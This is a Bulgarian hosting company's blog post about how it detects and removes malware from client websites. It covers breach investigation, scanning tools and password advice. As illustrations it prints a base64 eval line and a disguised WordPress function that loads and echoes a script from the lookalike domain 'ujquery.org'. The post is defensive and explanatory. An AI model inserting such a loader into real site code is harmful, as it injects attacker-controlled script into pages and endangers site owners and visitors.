Сигурността на данните в интернет – файлове, бази данни, имейли и други – е тема още от зората на WWW. Днес кибератаките са част от ежедневието на всеки потребител. Като хостинг компания, ние свързваме сайтовете на клиентите си с необятното интернет пространство, което крие не малко рискове както за собствениците на сайтове, така и за техните посетители.
Затова сигурността не е просто техническа необходимост за нас – тя е в основата на нашата философия и изграждането на доверие с клиентите.
През годините развихме умения и инструменти, с които не само разпознаваме различните етапи на една атака, но и изградихме процедури за реакция при всяка от тях. В тази статия ще Ви разкажем какво предприемаме при засичане на зловреден код и какви са следващите стъпки за възстановяване на засегнат сайт – независимо дали става дума за онлайн магазин или личен блог.
Засичане и нотификация при зловреден достъп
Нашата система за сигурност е настроена да открива зловредни файлове на сървърите, като използва натрупана база данни от подозрителен код, събирана с години. При засечено наличие на зловреден код, нашият екип получава нотификация своевременно. След което се задейства процедура за анализ и отстраняване на заразата в клиентския акаунт.
Проверка на начина на пробив
Сигурността е отговорност на три страни – разработчиците на сайта, хостинг доставчика и самия клиент. За съжаление, на хакерите им е нужна само една „вратичка“, за да получат достъп. В повечето случаи това са компрометирани пароли за cPanel или администрацията на сайта – в приблизително 70–80% от атаките.
Бележка: Ако още не сте, активирайте двуфакторното идентифициране за вход в cPanel. Технологията 2FA (Two-Factor Authentication) прави възможно използването на още един фактор, удостоверяващ идентичността на потребителя, освен потребителското име и паролата му за cPanel.
Други често срещани случаи:
- Пропуски в сигурността на добавени плъгини или теми;
- Вече заразен сайт, преместен при нас от друг хостинг доставчик.
Първата ни стъпка е да установим как точно е качен зловредният код. За целта преглеждаме:
- логовете на заявките към сайта и администрацията му;
- достъпа до cPanel, FTP, File Manager и други;
- всички възможни начини за качване или модификация на файлове.
След като преустановим достъпа на атакуващия, започваме процес по почистване на акаунта. Това не е механичен процес и често отнема време и изисква внимание. Нашият приоритет е да възстановим сайта в работещ вид възможно най-бързо.
Еволюция на зловредния код
Преди десетина години повечето злонамерени файлове изглеждаха елементарно:
eval(base64_decode("ZWNobyAnTUFMV0FSRSBWSVJVUyc7IA=="));Този тип код беше лесен за засичане и автоматизирано премахване. Днес обаче нещата са различни. Зловредният код е много по-сложен, често написан така, че да изглежда като част от нормалната функционалност. Може да използва обектно-ориентирано програмиране, да се крие зад стандартни WordPress функции или дори да изглежда като валиден външен скрипт:
add_action('wp_enqueue_scripts', 'us_styles', 12);
if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
$headers = get_headers($jquery, 1);
if ($headers[0] == 'HTTP/1.1 200 OK'){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
}На пръв поглед – безобиден код. На практика – потенциален вход за зловреден скрипт.
Нашите инструменти за откриване и почистване
За да се справим с модерния зловреден код, сме изградили цял набор от инструменти и решения:
- Антивирусна програма за сървъри
Подобно на антивирусните програми за компютри, тази на сървъра сканира файловете и засича подозрителен код. Основното предимство е, че можем да добавяме собствени сигнатури (образец) на зловреден код, което значително подобрява ефективността. - Imunify360. Цялостен пакет за сигурност, включващ:
- автоматично премахване на зловреден код,
- IP блокиране,
- защита от повторно заразяване.
- mod_security
Компонент на уеб сървъра Apache, който следи и блокира подозрителни HTTP заявки в реално време. - Собствени скриптове и инструменти
Разработили сме вътрешни решения, които ни помагат в бързото локализиране и премахване на проблеми.
Много от зловредните файлове имат способността още докато ги чистим да се репликират и така да се възстановяват автоматично. Затова всяко изчистване минава през повторна проверка със споменатите инструменти.
Информация и препоръки към клиента
След като акаунтът бъде почистен, не спираме до там. Винаги предоставяме на клиента подробна информация:
- как е осъществен зловредният достъп;
- какви файлове са били засегнати;
- какви действия сме предприели;
- какви са нашите препоръки.
Особено внимание обръщаме на паролите. Силните и уникални пароли са най-доброто начало за защита – те не трябва да се използват повторно на различни места.
Заключение
Хакването на сайт никога не е приятно преживяване, но с правилните действия и навременна реакция последствията могат да бъдат сведени до минимум. Нашата цел е не само да премахнем зловредния код, но и да помогнем на клиентите ни да предотвратят бъдещи злоупотреби.
Ако имате съмнение за зараза или просто искате да подсигурите сайта си, нашият екип е винаги на разположение.
Абонирайте се за СуперБлога, за да получавате полезно и експертно познание от света на уеб хостинг услугите, касаещо Вашия сайт и дигитално присъствие.
